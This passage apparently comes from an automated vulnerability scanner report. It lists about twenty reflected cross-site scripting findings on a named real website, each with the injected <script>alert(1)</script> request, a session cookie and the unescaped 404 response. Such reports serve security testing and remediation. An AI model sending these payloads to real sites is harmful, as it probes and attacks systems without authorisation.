<p>The requested URL /detail/44/themes/kosmos4bd55<script>alert(1)</script>c8caf12d1a3/images/ was not found on this server.</p>
...[SNIP]...

2.3112. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 96a0b<script>alert(1)</script>cb8062de9f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images96a0b<script>alert(1)</script>cb8062de9f9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images96a0b<script>alert(1)</script>cb8062de9f9/ was not found on this server.</p>
...[SNIP]...

2.3113. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57d11<script>alert(1)</script>351f5b5b698 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/?57d11<script>alert(1)</script>351f5b5b698=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/?57d11<script>alert(1)</script>351f5b5b698=1 was not found on this server.</p>
...[SNIP]...

2.3114. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f839a<script>alert(1)</script>ddabcc8ad44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf839a<script>alert(1)</script>ddabcc8ad44/44/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf839a<script>alert(1)</script>ddabcc8ad44/44/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3115. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec826<script>alert(1)</script>8efa857077c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44ec826<script>alert(1)</script>8efa857077c/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44ec826<script>alert(1)</script>8efa857077c/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3116. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 666f8<script>alert(1)</script>8e852533e76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes666f8<script>alert(1)</script>8e852533e76/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes666f8<script>alert(1)</script>8e852533e76/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3117. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41157<script>alert(1)</script>58469b4d7bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos41157<script>alert(1)</script>58469b4d7bc/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos41157<script>alert(1)</script>58469b4d7bc/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3118. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 58d26<script>alert(1)</script>7ecef6e5dfb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images58d26<script>alert(1)</script>7ecef6e5dfb/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images58d26<script>alert(1)</script>7ecef6e5dfb/rating/ was not found on this server.</p>
...[SNIP]...

2.3119. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 78240<script>alert(1)</script>9f7d7c58ba was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating78240<script>alert(1)</script>9f7d7c58ba/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating78240<script>alert(1)</script>9f7d7c58ba/ was not found on this server.</p>
...[SNIP]...

2.3120. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f41b5<script>alert(1)</script>b9e30f09570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/?f41b5<script>alert(1)</script>b9e30f09570=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/?f41b5<script>alert(1)</script>b9e30f09570=1 was not found on this server.</p>
...[SNIP]...

2.3121. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79424<script>alert(1)</script>0aa7359c607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail79424<script>alert(1)</script>0aa7359c607/44/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail79424<script>alert(1)</script>0aa7359c607/44/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3122. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76ade<script>alert(1)</script>6ae9a05b82b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4476ade<script>alert(1)</script>6ae9a05b82b/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4476ade<script>alert(1)</script>6ae9a05b82b/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3123. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bc5b5<script>alert(1)</script>865ce2849f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesbc5b5<script>alert(1)</script>865ce2849f0/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themesbc5b5<script>alert(1)</script>865ce2849f0/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3124. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5fe8<script>alert(1)</script>061a0fee5a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmosd5fe8<script>alert(1)</script>061a0fee5a2/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmosd5fe8<script>alert(1)</script>061a0fee5a2/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3125. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 713e3<script>alert(1)</script>d708abbcc16 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images713e3<script>alert(1)</script>d708abbcc16/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images713e3<script>alert(1)</script>d708abbcc16/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3126. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f8eb1<script>alert(1)</script>69e0aa82370 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/ratingf8eb1<script>alert(1)</script>69e0aa82370/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/ratingf8eb1<script>alert(1)</script>69e0aa82370/4.gif was not found on this server.</p>
...[SNIP]...

2.3127. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 896d0<script>alert(1)</script>e534daa8a97 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/4.gif896d0<script>alert(1)</script>e534daa8a97 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/4.gif896d0<script>alert(1)</script>e534daa8a97 was not found on this server.</p>
...[SNIP]...

2.3128. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 37ac1<script>alert(1)</script>406c7d999e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/4.gif?37ac1<script>alert(1)</script>406c7d999e3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/4.gif?37ac1<script>alert(1)</script>406c7d999e3=1 was not found on this server.</p>
...[SNIP]...

2.3129. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1009<script>alert(1)</script>6156c9bee99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf1009<script>alert(1)</script>6156c9bee99/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf1009<script>alert(1)</script>6156c9bee99/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3130. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f7eb<script>alert(1)</script>50619d9784 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/444f7eb<script>alert(1)</script>50619d9784/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/444f7eb<script>alert(1)</script>50619d9784/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3131. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

